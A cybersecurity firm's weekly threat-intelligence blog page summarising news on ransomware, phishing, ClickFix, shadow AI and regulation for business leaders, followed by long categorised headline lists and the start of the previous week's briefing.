AMD confirms some Zen 5 CPUs have a worrying security flaw that could put users at risk | TechRadar

Exploited 'Post SMTP' Plugin Flaw Exposes WordPress Sites to Takeover - SecurityWeek

China-linked hackers exploited Lanscope flaw as a zero-day in attacks

Researchers claim ChatGPT has a whole host of worrying security flaws - here's what they found | TechRadar

Hackers exploit WordPress plugin Post SMTP to hijack admin accounts

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 02/11/2025 Black Arrow Admin 02/11/2025

Black Arrow Cyber Threat Intelligence Briefing 31 October 2025

Black Arrow Cyber Threat Intelligence Briefing 31 October 2025:

-Ransomware Recovery Perils: 40% of Paying Victims Still Lose Their Data

-Reacting Slowly to a Security Breach Opens up Your Business to More Threats, Report Warns

-SMEs Unprepared to Defend Against Advanced Cyber Threats

-UK Financial Regulator to Focus on Cyber Defence

-The 10 Biggest Issues CISOs and Cyber Teams Face Today

-The Cyber Security Perception Gap: Why Executives and Practitioners See Security Differently

-Shadow AI: One In Four Employees Use Unapproved AI Tools, Research Finds

-LinkedIn Phishing Targets Finance Execs With Fake Board Invites

-Social Engineering: Why the ClickFix Malware Attack Just Won’t Go Away

-New Phishing Attack Using Invisible Characters Hidden in Subject Line

-BT Warns of Soaring Cyber Threats Targeting UK Firms

Executive Summary

This week, ransomware continues to underline the need for leaders to plan to prevent attacks and manage them effectively if the worst happens, with 40% of paying victims still unable to recover their data. SMEs face rising exposure as cyber criminals exploit weaker controls and limited recovery planning, showing that every organisation must understand its risk profile and response capability.

We see the UK financial regulator strengthening its stance on operational resilience, signalling growing expectations for leadership accountability. Business leaders are reassessing their exposure and security, but with a clear need to ensure perceptions of security reflect reality. Current threats include shadow AI, LinkedIn campaigns targeting executives, persistent malware, advanced phishing, and attackers constantly scanning potential victims for exploitable weaknesses.

These developments reinforce that resilience includes building security and preparing to manage an incident. Contact us to discuss how we help achieve this, including through impartial incident-response simulations that help leaders rehearse and objectively challenge their preparedness.

Ransomware Recovery Perils: 40% of Paying Victims Still Lose Their Data

A Hiscox survey of SMEs found that two in five organisations that pay ransoms still fail to recover their data. Ransomware attacks remain widespread, with 27% of firms hit in the past year and 80% paying in hopes of restoration. Experts say recovery often fails due to flawed encryption, corrupted backups and untested recovery plans. Paying rarely resolves the full breach, which may include data theft or GDPR implications. Strong preparation, tested backups, insurance and legal readiness are key to resilience.

Source: https://www.csoonline.com/article/4077484/ransomware-recovery-perils-40-of-paying-victims-still-lose-their-data.html

Reacting Slowly to a Security Breach Opens up Your Business to More Threats, Report Warns

Barracuda’s latest research finds most organisations suffered at least one email breach in the past year and slow response hugely increases follow-on risk. The report links delayed containment with higher odds of ransomware and material business disruption, including reputational harm and lost opportunities. Small firms are hit hard as recovery costs scale per employee and teams struggle to detect and triage incidents within an hour. The authors call for quicker detection, automation in response and a unified approach to break entire attack chains rather than point-in-time fixes.

Source: https://www.techradar.com/pro/security/reacting-slowly-to-a-security-breach-opens-up-your-business-to-more-threats-report-warns

SMEs Unprepared to Defend Against Advanced Cyber Threats

Vodafone’s latest report warns that Irish SMEs are struggling to keep pace with AI-driven cyber threats. One in four firms could collapse after a single ransomware attack, and AI-powered scams are expected to drive a 50% rise in attack costs within three years. Only half of SMEs rank cyber security as a top priority, while 69% lack proper safeguards. With attackers cloning voices and creating adaptive malware, Vodafone urges practical defences such as training, multi-factor authentication and partnerships with expert providers.

Source: https://www.techcentral.ie/smes-unprepared-to-defend-against-advanced-cyber-threats/

UK Financial Regulator to Focus on Cyber Defence

The Financial Conduct Authority (FCA) signalled a sharper focus on cyber defence and technology as part of its role in safeguarding national security. Speaking to City leaders, chief executive Nikhil Rathi argued that modern conflict hits balance sheets and markets as much as battlefields, and that the regulator must adapt accordingly. The speech pointed to bolstering operational resilience, tackling systemic tech risks and ensuring boards treat cyber as a strategic threat. Firms should expect closer scrutiny of preparedness and clearer expectations for governance, detection and recovery.

Source: https://www.uktech.news/news/government-and-policy/uk-financial-regulator-to-focus-on-cyber-defence-20251024

The 10 Biggest Issues CISOs and Cyber Teams Face Today

This piece outlines the pressures security leaders say are hardest right now. Priorities include securing AI infrastructure and data, simplifying sprawling toolsets, addressing talent burnout and budget constraints, and improving basic hygiene while preparing for high-impact incidents. The article stresses that AI use is outpacing guardrails, that misaligned incentives impede progress, and that boards seek clearer metrics tied to business outcomes. Leaders are urged to invest in automation, uplift human factors and embed cyber risk into enterprise decision making with repeatable reporting that executives can act on.

Source: https://www.csoonline.com/article/4077442/the-10-biggest-issues-cisos-and-cyber-teams-face-today-2.html

The Cyber Security Perception Gap: Why Executives and Practitioners See Security Differently

The article highlights a widening gap between executive confidence and practitioner reality. Frontline teams report tool complexity, alert fatigue and skills shortages, while leaders assume capabilities are stronger and incidents rarer than they are. The author says this misalignment leads to underfunded controls and delayed responses. Recommendations include rationalising tools, automating routine tasks and establishing common risk language and measures that map to resilience outcomes. Greater transparency on near misses and recovery times is urged so investment tracks real exposure rather than assumed maturity.

Source: https://thehackernews.com/2025/10/the-cybersecurity-perception-gap-why.html

Shadow AI: One In Four Employees Use Unapproved AI Tools, Research Finds

A 1Password report found that 27% of employees use AI tools not approved by their organisation, making shadow AI the second most common form of shadow IT after email. While 73% of workers say their company supports AI use, many bypass policies for convenience or productivity. Risks include data leakage, compliance breaches and malware. The report urges firms to maintain an AI tool inventory, define clear usage policies and limit access to authorised platforms to manage accumulated exposure risks.

Source: https://www.infosecurity-magazine.com/news/shadow-ai-employees-use-unapproved/

LinkedIn Phishing Targets Finance Execs With Fake Board Invites

A phishing campaign on LinkedIn is targeting finance executives with fake invitations to join an investment fund. Messages link to malicious sites that mimic LinkedIn and Microsoft login pages, stealing credentials and session cookies through an adversary-in-the-middle setup. Push Security reports that 34% of phishing attempts now occur outside email, up from under 10% three months ago. Attackers use CAPTCHA and Cloudflare Turnstile to evade scanners. Experts urge executives to verify unexpected LinkedIn messages and avoid clicking shared links.

Source: https://www.bleepingcomputer.com/news/security/linkedin-phishing-targets-finance-execs-with-fake-board-invites/

Social Engineering: Why the ClickFix Malware Attack Just Won’t Go Away

ClickFix remains stubborn because it persuades users to perform the risky action themselves, sidestepping many built-in protections. The article explains how browser prompts trick victims into copying and running commands that fetch malware, and describes FileFix as a related variant that uses File Explorer to trigger the same outcome. As the user initiates execution, technical controls may not trigger, so layered mitigations and user awareness are emphasised. The piece encourages stricter browser security policies and training that flags unusual copy-paste and command execution patterns.

Source: https://www.makeuseof.com/why-clickfix-malware-attack-just-wont-go-away/

New Phishing Attack Using Invisible Characters Hidden in Subject Line

Researchers observed attackers inserting invisible characters into email subject lines that bypass automated filters while appearing normal to users. The technique mixes MIME encoding and Unicode soft hyphens so keyword-based systems miss risky terms. It underscores how social engineering adapts when controls focus on predictable patterns. The article advises updating filter logic to normalise subject strings, strengthening multi-factor authentication, and coaching staff to treat odd formatting as a red flag. It also highlights the need to monitor for anomalies in the way messages appear in different email applications.

Source: https://cybersecuritynews.com/new-phishing-attack-using-invisible-characters/

BT Warns of Soaring Cyber Threats Targeting UK Firms

BT reported a 300% surge in cyber surveillance, with UK businesses now scanned over 4,000 times daily for vulnerabilities. Professional services, retail, and hospitality sectors face the most ransomware activity, with smaller firms hardest hit. BT urges proactive measures to strengthen cyber resilience.

Source: https://www.lawnews.co.uk/cyber/bt-warns-of-soaring-cyber-threats/

Governance, Risk and Compliance

UK financial regulator to focus on cyber defence - UKTN

Enterprises can’t keep a lid on surging cyber incident costs | IT Pro

The Cybersecurity Perception Gap: Why Executives and Practitioners See Risk Differently

CISOs Finally Get a Seat at the Board's Table

BSI Warns of Looming AI Governance Crisis - Infosecurity Magazine

Reacting slowly to a security breach opens up your business to more threats, report warns | TechRadar

LinkedIn phishing targets finance execs with fake board invites

BT Data Reveals 300% Rise in Cyber Surveillance on Businesses

UK businesses scanned 4000 times a day by hackers - Insurance Post

SMEs unprepared to defend against advanced cyber threats - TechCentral.ie

CFOs Double Down on AI and Cybersecurity as Tariffs Emerge as Major New Threat

Do CISOs need to rethink service provider risk? | CSO Online

The Cybersecurity Shift Every Business Needs to Make Today

The 10 biggest issues CISOs and cyber teams face today | CSO Online

Cyber and AI Oversight Disclosures: What Companies Shared in 2025

70% of CISOs say internal conflicts more damaging than cyberattacks | CSO Online

Threats

Ransomware, Extortion and Destructive Attacks

Ransomware recovery perils: 40% of paying victims still lose their data | CSO Online

Insider Threats Loom while Ransom Payment Rates Plummet - Security Boulevard

QBE predicts 40% rise in ransomware incidents by 2026 | Insurance Times

1 in 4 SMEs face ransomware risk - Shelflife Magazine

New LockBit Ransomware Victims Identified by Security Researchers - Infosecurity Magazine

Why Britain is struggling to stop the ransomware cyberattacks | The Week

Qilin Ransomware Group Publishes Over 40 Cases Monthly - Infosecurity Magazine

Why ransomware group names don’t matter for defense | SC Media

Three Factors Determine Whether a Ransomware Group is Successful - Security Boulevard

Ransomware Hackers Look for New Tactics Amid Falling Profits

Ransomware hackers are now running Linux encryptors in Windows to stay undetected | TechRadar

Preparing for the Digital Battlefield of 2026: Ghost Identities, Poisoned Accounts, & AI Agent Havoc

Russian Ransomware Gangs Weaponize Open-Source AdaptixC2 for Advanced Attacks

Cisco, Citrix and SonicWall VPNs connected to higher risk of ransomware infections | TechRadar

Uncovering Qilin attack methods exposed through multiple cases

Surprised, Not Surprised, Ransomware Attacks Have Ticked Up - Security Boulevard

Some lower-tier ransomware gangs have formed a new RaaS alliance — or have they? (1) – DataBreaches.Net

28% of Irish businesses risk closure with one ransomware attack

Pulling the plug: A way to halt a cyber attacker in your network? | Computer Weekly

Next-gen firewalls, VPNs can increase security risks: At-Bay • The Register

180 ransomware attacks plague education sector worldwide in 2025 through Q3 | K-12 Dive

Ransomware Victims

The costliest cyber attack in UK history | PQ Magazine

New LockBit Ransomware Victims Identified by Security Researchers - Infosecurity Magazine

Russian hackers threaten Dublin Airport | Cybernews

More Collins Aerospace Hacking Fallout - InfoRiskToday

TCS denies losing UK’s Marks & Spencer contract over £300 million cyberattack - The Economic Times

Co-op staff told to boost promotion of vapes after costly cyber-attack, document shows | Co-operative Group | The Guardian

Sweden’s power grid operator confirms data breach claimed by ransomware gang | The Record from Recorded Future News

Qilin claims pharmacy benefit manager MedImpact | Cybernews

Ransomware gang claims Conduent breach: what you should watch for next | Malwarebytes

Phishing & Email Based Attacks

LinkedIn phishing targets finance execs with fake board invites

New Phishing Attack Bypasses Using UUIDs Unique to Bypass Secure Email Gateways

New CoPhish attack steals OAuth tokens via Copilot Studio agents

New Phishing Attack Using Invisible Characters Hidden in Subject Line Using MIME Encoding - Cyber Security News

The 10 biggest issues CISOs and cyber teams face today | CSO Online

Scammers try to trick LastPass users into giving up credentials by telling them they’re dead – Computerworld

Fake LastPass death claims used to breach password vaults

How we linked ForumTroll APT to Dante spyware by Memento Labs | Securelist

Emerging Cyber Threats Featuring QR Codes ClickFix and LOLBins Challenging SOC Defenses

KnowBe4 Uncovers Surged Abuse of Legitimate Platforms by Cybercriminals in 2025

Smishing Triad Linked to 194,000 Malicious Domains in Global Phishing Operation

9 in 10 Exchange servers in Germany are out of support • The Register

ClickFix Infrastructure Surprises Inform Better Blocking

Google disputes false claims of massive Gmail data breach

Other Social Engineering

LinkedIn phishing targets finance execs with fake board invites

This new malware attack just wont go away

The 10 biggest issues CISOs and cyber teams face today | CSO Online

Scammers try to trick LastPass users into giving up credentials by telling them they’re dead – Computerworld

Fake LastPass death claims used to breach password vaults

Emerging Cyber Threats Featuring QR Codes ClickFix and LOLBins Challenging SOC Defenses

Smishing Triad Linked to 194,000 Malicious Domains in Global Phishing Operation

Hackers Use AI to Supercharge Social Engineering Attacks

ClickFix Infrastructure Surprises Inform Better Blocking

BiDi Swap: The bidirectional text trick that makes fake URLs look real

Google study finds Android avoids 58% more spam and scam texts compared to iOS

ICO fines sole trader for allegedly sending 1M spam texts • The Register

Fraud, Scams and Financial Crime

UK Fraud Cases Surge 17% Annually - Infosecurity Magazine

Europol Warns of Rising Threat From Caller ID Spoofing Attacks - Infosecurity Magazine

A Quarter of Scam Victims Have Considered Self-Harm - Infosecurity Magazine

Google study finds Android avoids 58% more spam and scam texts compared to iOS

Investment Scams Spread Across Asia With International Reach - Infosecurity Magazine

Stragglers From Myanmar Scam Center Raided by Army Cross Into Thailand as Buildings are Blown Up - SecurityWeek

Artificial Intelligence

New CoPhish attack steals OAuth tokens via Copilot Studio agents

BSI Warns of Looming AI Governance Crisis - Infosecurity Magazine

AI browsers are the next big target for hackers - Cryptopolitan

AI chatbots are sliding toward a privacy crisis - Help Net Security

The 10 biggest issues CISOs and cyber teams face today | CSO Online

Hackers Use AI to Supercharge Social Engineering Attacks

Preparing for the Digital Battlefield of 2026: Ghost Identities, Poisoned Accounts, & AI Agent Havoc

Are AI browsers worth the security risk? Why experts are worried | ZDNET

Dark AI is fueling cybercrime — and accelerating the cybersecurity arms race - Big Think

AI writes code like a junior dev, and security is feeling it - Help Net Security

AI agents can leak company data through simple web searches - Help Net Security

Chatbots parrot Putin propaganda about Ukraine invasion • The Register

Your photo could be all AI needs to clone your voice - Help Net Security

One In Four Employees Use Unapproved AI Tools, Research Finds - Infosecurity Magazine

Get your news from AI? Watch out - it's wrong almost half the time | ZDNET

AI Search Tools Easily Fooled by Fake Content

First Zero Click Attack Exploits MCP and Connected Popular AI Agents To Exfiltrate Data Silently

One week to opt out or be fodder for LinkedIn AI training • The Register

2FA/MFA

X: Re-enroll 2FA security keys by November 10 or get locked out

Malware

This new malware attack just wont go away

Emerging Cyber Threats Featuring QR Codes ClickFix and LOLBins Challenging SOC Defenses

Infostealers Run Wild - DataBreachToday

Hackers steal Discord accounts with RedTiger-based infostealer

Hackers weaponize Telegram messenger with malware to gain system control - Cryptopolitan

Malicious NPM packages fetch infostealer for Windows, Linux, macOS

PhantomRaven Malware Found in 126 npm Packages Stealing GitHub Tokens From Devs

Defenses Need to Adapt, Because the Malware Already Did

DDoS, data theft, and malware are storming the gaming industry - Help Net Security

Bots/Botnets

Botnets Step Up Cloud Attacks Via Flaws, Misconfigs

Experts Reports Sharp Increase in Automated Botnet Attacks Targeting PHP Servers and IoT Devices

Mobile

Android malware uses random text delays to look more human • The Register

Massive surge of NFC relay malware steals Europeans’ credit cards

Hackers weaponize Telegram messenger with malware to gain system control - Cryptopolitan

Europol Warns of Rising Threat From Caller ID Spoofing Attacks - Infosecurity Magazine

Google study finds Android avoids 58% more spam and scam texts compared to iOS

MPs urge UK government to stop phone theft wave through tech • The Register

Why the 5G symbol on your phone doesn't mean you actually have 5G - BBC News

iOS 26 Deletes Pegasus and Predator Spyware Infection Evidence by Overwriting The ‘shutdown.log’ file on Reboot

Denial of Service/DoS/DDoS

Security hole slams Chromium browsers - no fix yet • The Register

DDoS, data theft, and malware are storming the gaming industry - Help Net Security

Russian Rosselkhoznadzor hit by DDoS attack, food shipments across Russia delayed

Internet of Things – IoT

Experts Reports Sharp Increase in Automated Botnet Attacks Targeting PHP Servers and IoT Devices

How neighbors could spy on smart homes - Help Net Security

Data Breaches/Leaks

Infamous Cybercriminal Forum BreachForums Is Back Again With A New Clear Net Domain

List of Oracle EBS Attack Victims May Be Growing Longer

EY exposed 4TB SQL backup file to open web, researchers say • The Register

Hackers steal Discord accounts with RedTiger-based infostealer

F5 asserts limited impact from prolonged nation-state attack on its systems | CyberScoop

Hackers Allegedly Claim Breach Of HSBC USA Customers' Records Including Financial Details

Human impact of UK's Afghan data disaster revealed to MPs • The Register

When 183 Million Passwords Leak: How One Breach Fuels a Global Threat Chain - Security Boulevard

Email breaches are the silent killers of business growth - Help Net Security

First Zero Click Attack Exploits MCP and Connected Popular AI Agents To Exfiltrate Data Silently

Ransomware gang claims Conduent breach: what you should watch for next | Malwarebytes

No, Gmail has not suffered a massive 183 million passwords breach - but you should still look after your data | TechRadar

What to Do About the Massive Gmail Password Data Leak

Marketing giant Dentsu warns staff after Merkle data raid • The Register

Hackers steal data of fashion retailer Mango’s customers • Graham Cluley

DDoS, data theft, and malware are storming the gaming industry - Help Net Security

Iran’s MOIS-linked Ravin Academy hit by data breach • The Register

UK lotto players land data jackpot thanks to website error • The Register

Organised Crime & Criminal Actors

Infamous Cybercriminal Forum BreachForums Is Back Again With A New Clear Net Domain

UK Fraud Cases Surge 17% Annually - Infosecurity Magazine

Insider Threats Loom while Ransom Payment Rates Plummet - Security Boulevard

72 states sign first global UN Convention against Cybercrime - Help Net Security

Europol Warns of Rising Threat From Caller ID Spoofing Attacks - Infosecurity Magazine

Two U.K. teenagers appear in court over Transport of London cyber attack – DataBreaches.Net

UN Cybercrime Treaty wins dozens of signatories • The Register

Insider Risk and Insider Threats

Insider Threats Loom while Ransom Payment Rates Plummet - Security Boulevard

Insider Threat Prevention - Security Boulevard

Data on Insider Threats Reveal Hidden Risk Patterns

Insurance

Cyber insurance demand rises as global tensions fuel surge in digital threats - BetaNews

New threats spike cyber insurance surge

Supply Chain and Third Parties

Do CISOs need to rethink service provider risk? | CSO Online

NYSDFS Guidance on Managing Risks to Third-Party Service Provider

Google Investigates Weekslong Security Breach Involving Contractor — The Information

UK leads global fight to stop ransomware attacks on supply chains - GOV.UK

Cloud/SaaS

Botnets Step Up Cloud Attacks Via Flaws, Misconfigs

When it Rains it Pours: Lessons for Businesses Following the AWS Service Disruption | Baker Donelson - JDSupra

Microsoft: DNS outage impacts Azure and Microsoft 365 services

No, Gmail has not suffered a massive 183 million passwords breach - but you should still look after your data | TechRadar

What to Do About the Massive Gmail Password Data Leak

Germany issues hacked account checklist | Cybernews

Microsoft sued for allegedly tricking millions into Copilot M365 subscriptions

Microsoft Security Change for Azure Creates Pitfalls

Outages

When it Rains it Pours: Lessons for Businesses Following the AWS Service Disruption | Baker Donelson - JDSupra

Microsoft: DNS outage impacts Azure and Microsoft 365 services

Identity and Access Management

Active Directory at Risk Due to Domain-Join Account Misconfigurations

Encryption

Chrome to Make HTTPS Mandatory by Default in 2026 - Infosecurity Magazine

"It’s not about security, it’s about control" – How EU governments want to encrypt their own comms, but break our private chats | TechRadar

Linux and Open Source

Ransomware hackers are now running Linux encryptors in Windows to stay undetected | TechRadar

Ubuntu’s Kernel Vulnerability Let Attackers Escalate Privileges and Gain Root Access

Ultimate Guide to Open Source Security: Risks, Attacks & Defenses - Security Boulevard

Why open source may not survive the rise of generative AI | ZDNET

Passwords, Credential Stuffing & Brute Force Attacks

When 183 Million Passwords Leak: How One Breach Fuels a Global Threat Chain - Security Boulevard

Cybercriminals Trade 183 Million Stolen Credentials on Telegram, Dark Forums - SecurityWeek

Social Media

LinkedIn phishing targets finance execs with fake board invites

Germany issues hacked account checklist | Cybernews

X: Re-enroll 2FA security keys by November 10 or get locked out

One week to opt out or be fodder for LinkedIn AI training • The Register

Regulations, Fines and Legislation

UK financial regulator to focus on cyber defence - UKTN

"It’s not about security, it’s about control" – How EU governments want to encrypt their own comms, but break our private chats | TechRadar

Government Shutdown Creates Lapse in Cyber Threat Information Sharing | Alston & Bird - JDSupra

Shutdown Sparks 85% Increase in US Gov't Cyberattacks

US cybersecurity progress is 'slipping,' report warns | American Banker

72 states sign first global UN Convention against Cybercrime - Help Net Security

UN Cybercrime Treaty wins dozens of signatories • The Register

Navigating EMEA Regulatory Compliance for Critical Infrastructure | IT Pro

Navigating NIS2: What Organisations Need to Know as EU Implementation Unfolds | Goodwin - JDSupra

ICO fines sole trader for allegedly sending 1M spam texts • The Register

New York’s Cyber Rules Ramp Up Pressure on Security Officers

Models, Frameworks and Standards

Navigating NIS2: What Organisations Need to Know as EU Implementation Unfolds | Goodwin - JDSupra

Careers, Working in Cyber and Information Security

Cyber Pros Needed: Securing the Middle Ground

Cross-border cooperation can help to tackle global cyber talent shortage

‘You can be an ethical hacker, not a criminal one’: the initiative guiding young gamers into cybersecurity | From Play To Purpose | The Guardian

Top tips to prepare for a cybersecurity job interview

Law Enforcement Action and Take Downs

Infamous Cybercriminal Forum BreachForums Is Back Again With A New Clear Net Domain

Two U.K. teenagers appear in court over Transport of London cyber attack – DataBreaches.Net

72 states sign first global UN Convention against Cybercrime - Help Net Security

UN Cybercrime Treaty wins dozens of signatories • The Register

Europol Warns of Rising Threat From Caller ID Spoofing Attacks - Infosecurity Magazine

Stragglers From Myanmar Scam Center Raided by Army Cross Into Thailand as Buildings are Blown Up - SecurityWeek

Ex-US cyber intel exec pleads guilty to selling spy tools to Russian broker | Reuters

Misinformation, Disinformation and Propaganda

Chatbots parrot Putin propaganda about Ukraine invasion • The Register

Millions shown fake news about the state pension by Google

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

How China really spies on the UK in 2025 - BBC News

‘I am not a robot’: Russian hackers use fake CAPTCHA lures to deploy espionage tools | CSO Online

Shifting from reactive to proactive: Cyber resilience amid nation-state espionage | CyberScoop

Suspected Chinese snoops weaponize unpatched Windows flaw • The Register

Diplomatic entities in Belgium and Hungary hacked in China-linked spy campaign | The Record from Recorded Future News

New corporate espionage claims emerge, centered on two highly valued 401(k) admin startups | TechCrunch

Nation State Actors

China

How China really spies on the UK in 2025 - BBC News

F5 asserts limited impact from prolonged nation-state attack on its systems | CyberScoop

CISA Flags VMware Zero-Day Exploited by China-Linked Hackers in Active Attacks

Suspected Chinese snoops weaponize unpatched Windows flaw • The Register

Diplomatic entities in Belgium and Hungary hacked in China-linked spy campaign | The Record from Recorded Future News

Britain Needs China’s Money. It Fears What Comes With It. - The New York Times

Defence lawyers would have used Tories’ statements to dismiss China spy case, attorney general says | Espionage | The Guardian

US company with access to biggest telecom firms uncovers breach by nation-state hackers | Reuters

China-linked hackers exploit patched ToolShell flaw to breach Middle East telecom

US Government Urges Total Ban of Our Most Popular Wi-Fi Router - CNET

Russia

‘I am not a robot’: Russian hackers use fake CAPTCHA lures to deploy espionage tools | CSO Online

Sanctions won’t stop cyberattacks, but they can still "bite" - Help Net Security

Chatbots parrot Putin propaganda about Ukraine invasion • The Register

Russian Ransomware Gangs Weaponize Open-Source AdaptixC2 for Advanced Attacks

Nation-State Cyber Ecosystems Weakened by Sanctions, Report Reveals - Infosecurity Magazine

Ukraine strengthens its cyberterrorism response system - National Security and Defense Council of Ukraine

Russian hackers, likely linked to Sandworm, exploit legitimate tools against Ukrainian targets

Ex-US cyber intel exec pleads guilty to selling spy tools to Russian broker | Reuters

NBC Weapons: Russia Resorts to Chemical Warfare

Russian Rosselkhoznadzor hit by DDoS attack, food shipments across Russia delayed

Iran

Iran’s MOIS-linked Ravin Academy hit by data breach • The Register

North Korea

North Korean Hackers Attacking Unmanned Aerial Vehicle Industry to Steal Confidential Data

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

APT36 Targets Indian Government with Golang-Based DeskRAT Malware Campaign

SideWinder Hacking Group Uses ClickOnce-Based Infection Chain to Deploy StealerBot Malware

How we linked ForumTroll APT to Dante spyware by Memento Labs | Securelist

Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware

Tools and Controls

AI browsers are the next big target for hackers - Cryptopolitan

AI writes code like a junior dev, and security is feeling it - Help Net Security

Shifting from reactive to proactive: Cyber resilience amid nation-state espionage | CyberScoop

Active Directory at Risk Due to Domain-Join Account Misconfigurations

Cyber insurance demand rises as global tensions fuel surge in digital threats - BetaNews

The 10 biggest issues CISOs and cyber teams face today | CSO Online

Are AI browsers worth the security risk? Why experts are worried | ZDNET

AI browsers are a cybersecurity time bomb | The Verge

Cisco, Citrix and SonicWall VPNs connected to higher risk of ransomware infections | TechRadar

Reacting slowly to a security breach opens up your business to more threats, report warns | TechRadar

CFOs Double Down on AI and Cybersecurity as Tariffs Emerge as Major New Threat

Digital Risk Management Strategies

Why Early Threat Detection Is a Must for Long-Term Business Growth

The State of Exposure Management in 2025: Insights From 3,000+ Organizations

NYSDFS Guidance on Managing Risks to Third-Party Service Provider

Pulling the plug: A way to halt a cyber attacker in your network? | Computer Weekly

Next-gen firewalls, VPNs can increase security risks: At-Bay • The Register

Mozilla: New Firefox extensions must disclose data collection practices

CISA and NSA share tips on securing Microsoft Exchange servers

US Government Urges Total Ban of Our Most Popular Wi-Fi Router - CNET

Other News

81% Router Users Have Not Changed Default Admin Passwords, Exposing Devices to Hackers

Could the internet go offline? Inside the fragile system holding the modern world together | Internet | The Guardian

New corporate espionage claims emerge, centered on two highly valued 401(k) admin startups | TechCrunch

Security must go industrial if it hopes to meet tomorrow's challenges | SC Media

Alan Turing institute launches new mission to protect UK from cyber-attacks | Internet | The Guardian

Canada Says Hackers Tampered With ICS at Water Facility, Oil and Gas Firm - SecurityWeek

Vulnerability Management

The State of Exposure Management in 2025: Insights From 3,000+ Organizations

Ultimate Guide to Open Source Security: Risks, Attacks & Defenses - Security Boulevard

9 in 10 Exchange servers in Germany are out of support • The Register

NHS quarantines devices as suppliers drag feet on Windows 11 • The Register

Vulnerabilities

List of Oracle EBS Attack Victims May Be Growing Longer

Microsoft Issues Emergency Patch for Windows Server Bug

CVE-2025-59287: Microsoft fixes critical WSUS flaw under active attack

Microsoft WSUS attacks hit 'multiple' orgs, Google warns • The Register

CISA Flags VMware Zero-Day Exploited by China-Linked Hackers in Active Attacks

Suspected Chinese snoops weaponize unpatched Windows flaw • The Register

Ubuntu’s Kernel Vulnerability Let Attackers Escalate Privileges and Gain Root Access

Multiple Oracle VM VirtualBox Vulnerabilities Enables Complete Takeover Of VirtualBox

Year-Old WordPress Plugin Flaws Exploited to Hack Websites - SecurityWeek

Apache Tomcat Security Vulnerabilities Expose Servers to Remote Code Execution Attacks

OpenVPN Vulnerability Exposes Linux, MacOS Systems To Script Injection Attacks

New "Brash" Exploit Crashes Chromium Browsers Instantly with a Single Malicious URL

Chrome Zero-Day Exploited to Deliver Italian Memento Labs' LeetAgent Spyware

Security hole slams Chromium browsers - no fix yet • The Register

Chrome 0-Day Vulnerability Actively Exploited in Attacks by Notorious Hacker Group

QNAP warns of critical ASP.NET flaw in its Windows backup software

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 26/10/2025 Black Arrow Admin 26/10/2025

Black Arrow Cyber Threat Intelligence Briefing 24 October 2025

Black Arrow Cyber Threat Intelligence Briefing 24 October 2025:

-GCHQ Says Boards Must Understand Cyber Risks and Prepare for Attacks That Get Through

-Study Reveals Cyber Confidence Often Misaligned with Reality

-Threat Actors Exploiting Faster Than Businesses Can Respond

-Millions Still Use One Password Across Multiple Accounts

-Microsoft Warns of Sharp Rise in Identity Attacks Driven by Password Theft

-Insider Risks Cause Data Loss in 77% of Organisations

-AI-Driven Threats Are Top Concern for Cyber Professionals in 2026

-Infostealers Are Reshaping the Cyber Security Landscape

-How ClickFix Attackers Trick You to Attack Yourself and Bypass Your Security

-Business Confidence in Ransomware Defence Is High, But Readiness Is Low

-Ransomware Payouts Surge to $36M in Recent Cases

-Third-Party Breaches Escalate as Confidence Gap Widens Among Cyber Leaders

Executive Summary

This week, the head of GCHQ has urged businesses to ensure their boards include members who understand cyber risks and can ask the right questions, while a new report highlights that many organisations are misaligned in their perception of cyber security strength versus actual security.

We also include a reminder about one of the most basic cyber controls: passwords. Millions of users have a single password for multiple accounts, and Microsoft warns of a rise in attacks driven by password theft. Our other insights include attackers exploiting vulnerabilities within days and using AI to scale their impact, the rising threat of ransomware, and the broader consequences of business leaders not recognising the gaps in their defences including the importance of testing incident response plans.

Responding to the above GCHQ call to action, contact us to learn how we support our client boards in their cyber governance and compliance. We join regular board meetings to lead the conversation on progress in building stronger and proportionate cyber security, while upskilling board members to support continuous development.

GCHQ Says Boards Must Understand Cyber Risks and Prepare for Attacks That Get Through

The head of GCHQ has urged UK companies to prepare for inevitable cyber-attacks by developing contingency plans that include offline crisis protocols. Speaking at a cyber security conference, Anne Keast-Butler stressed that boards must include members who understand cyber risks and can ask the right questions. She highlighted the increasing frequency of significant attacks and the role of AI in lowering the barrier for malicious actors. The National Cyber Security Centre reported a sharp rise in major incidents, and underscored the need for rehearsed response strategies by leadership teams.

Source: https://www.theguardian.com/technology/2025/oct/23/gchq-companies-cyber-crime-threat

Study Reveals Cyber Confidence Often Misaligned with Reality

